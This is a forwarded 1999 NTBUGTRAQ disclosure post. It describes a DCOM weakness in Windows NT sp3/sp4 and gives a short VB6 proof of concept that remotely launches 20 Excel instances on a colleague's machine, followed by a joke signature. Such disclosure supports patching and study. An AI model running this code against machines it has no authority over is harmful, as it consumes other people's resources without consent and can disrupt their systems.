FW: DCOM attack against NT using VB6

From: Hargett, Matt (Matt_Hargettat_private)
Date: Wed Aug 18 1999 - 11:58:51 PDT

    -----Original Message-----
    From: Rob Lempke [mailto:rlempkeat_private]
    Sent: Wednesday, August 11, 1999 1:27 PM
    To: NTBUGTRAQat_private
    Subject: DCOM attack against NT using VB6

    Using the code below I was able to create 20 instances of Excel on my
    co-workers machines without modifying their machines at all.  The target
    must be Windows NT Workstation/Server running sp3 or sp4. sp5 seems to
    prevent the attack.

    Private Sub Command1_Click()
        Dim xlObj As Object
        Dim xlCollection As New Collection
        Dim i As Long
        For i = 1 To 20
            Set xlObj = CreateObject("Excel.Application", "\\NTBox")
            xlCollection.Add xlObj
        Next i

        i = 1
        'clean up
        While xlCollection.Count > 0
            xlCollection.Remove (xlCollection.Count)
        Wend
        Set xlCollection = Nothing
    End Sub

    -Robert E. Lempke
    Steven Wright one Liners:
    "Black holes are where God divided by zero."
    "Quantum Mechanics:  The dreams stuff is made of."
    "Early bird gets the worm, but the second mouse gets the cheese."
    "If everything seems to be going well, you have obviously overlooked
    something."
    "Join the Army, meet interesting people, kill them."
    "Success always occurs in private, and failure in full view."
    "Ambition is a poor excuse for not having enough sense to be lazy."
    "Hard work pays off in the future.  Laziness pays off now."
    "Everyone has a photographic memory.  Some don't have film."
    "Drink until she's cute, but stop before the wedding."